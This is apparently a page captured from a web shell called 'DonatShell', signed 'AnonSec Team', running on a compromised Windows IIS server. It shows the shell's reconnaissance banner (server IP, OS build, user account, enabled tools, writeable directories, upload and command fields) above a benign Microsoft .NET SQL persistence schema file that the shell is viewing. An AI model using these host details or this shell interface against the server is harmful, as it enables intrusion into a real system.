DonatShell
Server IP : 180.180.241.3  /  Your IP : 216.73.216.252
Web Server : Microsoft-IIS/7.5
System : Windows NT NETWORK-NHRC 6.1 build 7601 (Windows Server 2008 R2 Standard Edition Service Pack 1) i586
User : IUSR ( 0)
PHP Version : 5.3.28
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/Windows/Microsoft.NET/Framework64/v3.5/SQL/EN/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/Windows/Microsoft.NET/Framework64/v3.5/SQL/EN/SqlPersistenceProviderSchema.sql
˙ūSET ANSI_NULLS ON

GO

SET QUOTED_IDENTIFIER ON

GO



declare @localized_string_AddRole_Failed nvarchar(256)

set @localized_string_AddRole_Failed = N'Failed adding the ''persistenceUsers'' role'



DECLARE @ret int, @Error int

IF NOT EXISTS( SELECT 1 FROM [dbo].[sysusers] WHERE name=N'persistenceUsers' and issqlrole=1 )

 BEGIN



	EXEC @ret = sp_addrole N'persistenceUsers'



	SELECT @Error = @@ERROR



	IF @ret <> 0 or @Error <> 0

		RAISERROR( @localized_string_AddRole_Failed, 16, -1 )

 END

GO



IF EXISTS (SELECT * FROM sys.objects WHERE object_id = OBJECT_ID(N'[dbo].[InstanceData]') AND type in (N'U'))

	DROP TABLE [dbo].[InstanceData]

GO

CREATE TABLE [dbo].[InstanceData](

	[id] [uniqueidentifier] NOT NULL,	

	[instance] [image] NULL,

	[instanceXml] [xml] NULL,

	[created] [datetime] NOT NULL,

	[lastUpdated] [datetime] NOT NULL,

	[lockOwner] [uniqueidentifier] NULL,

	[lockExpiration] [datetime] NULL

) ON [PRIMARY] TEXTIMAGE_ON [PRIMARY]

GO

CREATE UNIQUE CLUSTERED INDEX id_index

	ON [dbo].[InstanceData] ([id])

	WITH IGNORE_DUP_KEY

GO

Anon7 - 2022
AnonSec Team